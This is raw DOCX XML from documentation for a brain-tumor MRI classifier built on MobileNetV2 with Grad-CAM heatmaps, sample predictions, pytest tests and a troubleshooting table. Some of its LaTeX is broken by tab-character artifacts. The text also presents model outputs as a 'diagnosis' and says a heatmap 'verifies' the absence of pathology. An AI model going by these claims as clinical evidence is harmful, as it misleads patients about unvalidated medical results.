          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
          <w:color w:val="1E293B"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> (</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="B91C1C"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>"meningioma"</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
          <w:color w:val="1E293B"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>).</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListBullet"/>
        <w:spacing w:after="60"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
          <w:color w:val="1E293B"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>Confidence score: $94.12\%$.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListBullet"/>
        <w:spacing w:after="60"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="B91C1C"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>tf.GradientTape</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
          <w:color w:val="1E293B"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> extracts gradients $\frac{\partial (0.9412)}{\partial (</w:t>
        <w:tab/>
        <w:t>ext{out\_relu})}$.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListBullet"/>
        <w:spacing w:after="60"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
          <w:color w:val="1E293B"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>Channel weights $\alpha_k$ calculated; linear combination computed; ReLU applied.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListBullet"/>
        <w:spacing w:after="60"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
          <w:color w:val="1E293B"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">Returns $7 </w:t>
        <w:tab/>
        <w:t>imes 7$ normalized heatmap array.</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Phase 4: Saliency Compositing</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListNumber"/>
        <w:spacing w:after="60"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="B91C1C"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>create_superimposed_overlay()</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
          <w:color w:val="1E293B"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> upsamples the $7 </w:t>
        <w:tab/>
        <w:t xml:space="preserve">imes 7$ heatmap to $224 </w:t>
        <w:tab/>
        <w:t>imes 224$.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListNumber"/>
        <w:spacing w:after="60"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
          <w:color w:val="1E293B"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">Applies OpenCV </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="B91C1C"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>COLORMAP_JET</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
          <w:color w:val="1E293B"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>: high activation pixels along the dura mater turn fiery red/yellow; brain tissue turns blue.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListNumber"/>
        <w:spacing w:after="60"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
          <w:color w:val="1E293B"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>Alpha blends at $\alpha = 0.45$: creates the final diagnostic overlay.</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Phase 5: Browser Rendering</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="120" w:line="276" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
          <w:color w:val="1E293B"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>Within 350 milliseconds of selecting the dropdown, the browser displays:</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListNumber"/>
        <w:spacing w:after="60"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:color w:val="0F172A"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>Primary Diagnosis Banner (Red Theme):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 PRIMARY DIAGNOSIS RESULT: Meningioma Tumor</w:t>
              <w:br/>
              <w:t xml:space="preserve">   Confidence: 94.1%</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p>
      <w:pPr>
        <w:spacing w:after="120"/>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListNumber"/>
        <w:spacing w:after="60"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:color w:val="0F172A"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>Left Column (Visual Saliency Studio):</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListBullet"/>
        <w:spacing w:after="60"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
          <w:color w:val="1E293B"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>Shows the original brain MRI scan with a bright red glowing hotspot centered on the dural lesion.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListNumber"/>
        <w:spacing w:after="60"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:color w:val="0F172A"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>Right Column (Multi-Class Probabilities):</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListBullet"/>
        <w:spacing w:after="60"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
          <w:color w:val="1E293B"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">Meningioma: </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="B91C1C"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>94.12%</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
          <w:color w:val="1E293B"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> (Long orange bar)</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListBullet"/>
        <w:spacing w:after="60"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
          <w:color w:val="1E293B"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">Glioma: </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="B91C1C"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>3.81%</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
          <w:color w:val="1E293B"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> (Small red bar)</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListBullet"/>
        <w:spacing w:after="60"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
          <w:color w:val="1E293B"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">Pituitary: </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="B91C1C"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>1.95%</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
          <w:color w:val="1E293B"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> (Small purple bar)</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListBullet"/>
        <w:spacing w:after="60"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
          <w:color w:val="1E293B"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">Healthy (No Tumor): </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="B91C1C"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>0.12%</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
          <w:color w:val="1E293B"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> (Tiny green bar)</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListNumber"/>
        <w:spacing w:after="60"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:color w:val="0F172A"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>Validation Card:</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Validation: Ground Truth: meningioma | Prediction: meningioma [MATCHED]</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12.2 What Happens If the Input Changes to a Healthy Brain?</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="120" w:line="276" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
          <w:color w:val="1E293B"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">If the user switches the dropdown to </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:color w:val="0F172A"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>`Healthy (No Tumor) (Sample #1)`</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
          <w:color w:val="1E293B"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListNumber"/>
        <w:spacing w:after="60"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
          <w:color w:val="1E293B"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>The model outputs:</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="120" w:line="276" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
          <w:color w:val="1E293B"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>$$</w:t>
        <w:tab/>
        <w:t>ext{probs} = [0.0021, 0.0018, 0.9942, 0.0019]$$</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListNumber"/>
        <w:spacing w:after="60"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="B91C1C"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>is_healthy = True</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
          <w:color w:val="1E293B"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListNumber"/>
        <w:spacing w:after="60"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
          <w:color w:val="1E293B"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">The Primary Diagnosis Banner shifts dynamically from Red to </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:color w:val="0F172A"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>Emerald Green</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 PRIMARY DIAGNOSIS RESULT: Healthy (No Tumor)</w:t>
              <w:br/>
              <w:t xml:space="preserve">   Confidence: 99.4%</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p>
      <w:pPr>
        <w:spacing w:after="120"/>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListNumber"/>
        <w:spacing w:after="60"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
          <w:color w:val="1E293B"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>In the Saliency Studio, the Grad-CAM heatmap shows no intense focal hotspots over brain tissue, visually verifying the absence of pathological mass effect!</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13: Testing and Troubleshooting</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:spacing w:before="320" w:after="120"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:color w:val="2563EB"/>
          <w:sz w:val="28"/>
        </w:rPr>
        <w:t>13.1 Existing Testing Mechanisms in the Codebase</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="120" w:line="276" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
          <w:color w:val="1E293B"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>In our project, testing was implemented through empirical validation and scientific auditing routines:</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListNumber"/>
        <w:spacing w:after="60"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:color w:val="0F172A"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>Cryptographic Data Leakage Test (`01_data_exploration.ipynb`):</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListBullet"/>
        <w:spacing w:after="60"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
          <w:color w:val="1E293B"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>Verified that no identical MRI slices exist in both the Training and Testing splits by comparing MD5 hashes across all 7,200 images.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListBullet"/>
        <w:spacing w:after="60"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
          <w:color w:val="1E293B"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">Result: </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:color w:val="0F172A"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>0 leaked images (100% clean split separation).</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListNumber"/>
        <w:spacing w:after="60"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:color w:val="0F172A"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>Channel &amp; Dimension Integrity Test (`01_data_exploration.ipynb`):</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListBullet"/>
        <w:spacing w:after="60"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
          <w:color w:val="1E293B"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">Scanned all images to identify unique resolutions (447 unique sizes) and color modes (RGB, Grayscale L, RGBA), establishing the strict requirement for 3-channel conversion and $224 </w:t>
        <w:tab/>
        <w:t>imes 224$ resizing.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListNumber"/>
        <w:spacing w:after="60"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:color w:val="0F172A"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>Out-of-Sample Generalization Test (`02_model_training.ipynb`):</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListBullet"/>
        <w:spacing w:after="60"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
          <w:color w:val="1E293B"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">Benchmarked performance against 1,600 untouched test scans using Scikit-Learn's </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="B91C1C"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>classification_report</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
          <w:color w:val="1E293B"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> and </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="B91C1C"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>confusion_matrix</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
          <w:color w:val="1E293B"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListNumber"/>
        <w:spacing w:after="60"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:color w:val="0F172A"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>Model Deserialization &amp; Syntax Test:</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListBullet"/>
        <w:spacing w:after="60"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
          <w:color w:val="1E293B"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">Validated that </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="B91C1C"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>brain_tumor_mobilenetv2_full_scratch.keras</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
          <w:color w:val="1E293B"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> loads cleanly in Python and compiles without syntax warnings via </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="B91C1C"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>py_compile app.py</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
          <w:color w:val="1E293B"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>.</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13.2 Recommended Automated Unit Test Suite (`tests/test_pipeline.py`)</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="120" w:line="276" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
          <w:color w:val="1E293B"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">For enterprise continuous integration (CI/CD), we recommend formalizing these unit tests using </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="B91C1C"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>pytest</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
          <w:color w:val="1E293B"/>
          <w:sz w:val="20"/>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import pytest</w:t>
              <w:br/>
              <w:t>import numpy as np</w:t>
              <w:br/>
              <w:t>import tensorflow as tf</w:t>
              <w:br/>
              <w:t>from app import load_neuroscan_model, compute_gradcam, create_superimposed_overlay</w:t>
              <w:br/>
              <w:br/>
              <w:t>@pytest.fixture(scope="session")</w:t>
              <w:br/>
              <w:t>def loaded_models():</w:t>
              <w:br/>
              <w:t xml:space="preserve">    # Loads the model once for all test cases.</w:t>
              <w:br/>
              <w:t xml:space="preserve">    model, base_model = load_neuroscan_model()</w:t>
              <w:br/>
              <w:t xml:space="preserve">    return model, base_model</w:t>
              <w:br/>
              <w:br/>
              <w:t>def test_model_loading(loaded_models):</w:t>
              <w:br/>
              <w:t xml:space="preserve">    # Verify that both outer model and base model are successfully instantiated.</w:t>
              <w:br/>
              <w:t xml:space="preserve">    model, base_model = loaded_models</w:t>
              <w:br/>
              <w:t xml:space="preserve">    assert model is not None, "Outer model failed to load from disk"</w:t>
              <w:br/>
              <w:t xml:space="preserve">    assert base_model is not None, "Base MobileNetV2 model layer could not be located"</w:t>
              <w:br/>
              <w:br/>
              <w:t>def test_prediction_output_shape_and_probability(loaded_models):</w:t>
              <w:br/>
              <w:t xml:space="preserve">    # Ensure dummy input produces a valid probability vector of length 4 summing to 1.0.</w:t>
              <w:br/>
              <w:t xml:space="preserve">    model, _ = loaded_models</w:t>
              <w:br/>
              <w:t xml:space="preserve">    dummy_input = np.random.uniform(0, 255, (1, 224, 224, 3)).astype("float32")</w:t>
              <w:br/>
              <w:t xml:space="preserve">    preds = model.predict(dummy_input)</w:t>
              <w:br/>
              <w:t xml:space="preserve">    </w:t>
              <w:br/>
              <w:t xml:space="preserve">    assert preds.shape == (1, 4), f"Expected shape (1, 4), got {preds.shape}"</w:t>
              <w:br/>
              <w:t xml:space="preserve">    assert np.isclose(np.sum(preds[0]), 1.0, atol=1e-5), "Probabilities do not sum to 1.0"</w:t>
              <w:br/>
              <w:t xml:space="preserve">    assert np.all(preds &gt;= 0.0) and np.all(preds &lt;= 1.0), "Probabilities out of [0, 1] range"</w:t>
              <w:br/>
              <w:br/>
              <w:t>def test_gradcam_output_shape_and_normalization(loaded_models):</w:t>
              <w:br/>
              <w:t xml:space="preserve">    # Verify Grad-CAM produces a 7x7 heatmap with values normalized strictly in [0.0, 1.0].</w:t>
              <w:br/>
              <w:t xml:space="preserve">    model, base_model = loaded_models</w:t>
              <w:br/>
              <w:t xml:space="preserve">    dummy_input = np.random.uniform(0, 255, (1, 224, 224, 3)).astype("float32")</w:t>
              <w:br/>
              <w:t xml:space="preserve">    heatmap, probs, pred_idx = compute_gradcam(dummy_input, model, base_model)</w:t>
              <w:br/>
              <w:t xml:space="preserve">    </w:t>
              <w:br/>
              <w:t xml:space="preserve">    assert heatmap.shape == (7, 7), f"Expected heatmap shape (7, 7), got {heatmap.shape}"</w:t>
              <w:br/>
              <w:t xml:space="preserve">    assert heatmap.min() &gt;= 0.0, "Heatmap contains negative values (ReLU failed)"</w:t>
              <w:br/>
              <w:t xml:space="preserve">    assert heatmap.max() &lt;= 1.0, "Heatmap max value exceeds 1.0"</w:t>
              <w:br/>
              <w:t xml:space="preserve">    assert pred_idx in [0, 1, 2, 3], f"Invalid class index {pred_idx}"</w:t>
              <w:br/>
              <w:br/>
              <w:t>def test_superimposed_overlay_shape():</w:t>
              <w:br/>
              <w:t xml:space="preserve">    # Verify overlay returns a 3-channel RGB image matching original dimensions.</w:t>
              <w:br/>
              <w:t xml:space="preserve">    dummy_image = np.zeros((224, 224, 3), dtype=np.uint8)</w:t>
              <w:br/>
              <w:t xml:space="preserve">    dummy_heatmap = np.ones((7, 7), dtype=np.float32)</w:t>
              <w:br/>
              <w:t xml:space="preserve">    overlay, jet_map = create_superimposed_overlay(dummy_image, dummy_heatmap, alpha=0.45)</w:t>
              <w:br/>
              <w:t xml:space="preserve">    </w:t>
              <w:br/>
              <w:t xml:space="preserve">    assert overlay.shape == (224, 224, 3), "Overlay dimension mismatch"</w:t>
              <w:br/>
              <w:t xml:space="preserve">    assert overlay.dtype == np.uint8, "Overlay must be 8-bit unsigned integer"</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p>
      <w:pPr>
        <w:spacing w:after="120"/>
      </w:pP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13.3 Comprehensive Troubleshooting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40" w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
                <w:b/>
                <w:color w:val="FFFFFF"/>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>Issue &amp; Error Message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Root Cause</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Verification Step</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t>Fix / Resolution</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="1872"/>
            <w:shd w:fill="1E3A8A"/>
            <w:tcMar>
              <w:top w:w="80" w:type="dxa"/>
              <w:bottom w:w="80" w:type="dxa"/>
              <w:left w:w="120" w:type="dxa"/>
              <w:right w:w="120" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="40" w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
                <w:b/>
                <w:color w:val="FFFFFF"/>
                <w:sz w:val="18"/>
              </w:rPr>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`ModuleNotFoundError: No module named 'tensorflow'`</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Python command was executed using global system Python rather than the project virtual environment.</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Run `which python` or `Get-Command python` to check the executable path.</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Execute using the virtual environment: `d:\Brain_Tumor\.venv\Scripts\python.exe` or run `.\.venv\Scripts\activate` first.</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`NameError: name 'model' is not defined`</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The Jupyter notebook kernel was restarted or reloaded, wiping variable state from RAM.</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Look at the cell execution counter `In [1]`.</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Re-run setup cells (Cells 0, 1, 4) and reload the model checkpoint via `tf.keras.models.load_model()`.</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`Model file not found at: models/...`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The `.keras` file was moved, renamed, or training was not completed.</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Run `Test-Path models\brain_tumor_mobilenetv2_full_scratch.keras`.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Re-run Cell 14 in `02_model_training.ipynb` to save the checkpoint or restore from backup.</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`Port 8501 is already in use`</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A previous instance of Streamlit is still running in the background on port 8501.</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Run `netstat -ano \</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findstr :8501` to find the process ID (PID).</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Kill the process via `Stop-Process -Id &lt;PID&gt; -Force` or run on a new port: `streamlit run app.py --server.port 8502`.</w:t>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`ValueError: Input 0 of layer is incompatible: expected shape=(None, 224, 224, 3)`</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An image with arbitrary dimensions was passed without resizing, or a grayscale image (1 channel) was passed.</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Print `img.shape` before feeding to model.</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Ensure `img.convert('RGB')` and `cv2.resize(img, (224, 224))` run before tensor packaging.</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`ImportError: numpy.core.multiarray failed to import`</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NumPy 2.0 was installed in an environment with a TensorFlow version built for NumPy 1.x.</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Run `python -c "import numpy; print(numpy.__version__)"`.</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Downgrade NumPy: `pip install "numpy&gt;=1.24.0,&lt;2.0.0"`.</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`UnicodeEncodeError: 'charmap' codec can't encode characters`</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Windows command prompt terminal attempting to print UTF-8 emojis or progress bars under CP1252 codepage.</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Check terminal encoding via `chcp`.</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Set terminal codepage to UTF-8 via `chcp 65001` or add `sys.stdout.reconfigure(encoding='utf-8')`.</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`ResourceExhaustedError: OOM when allocating 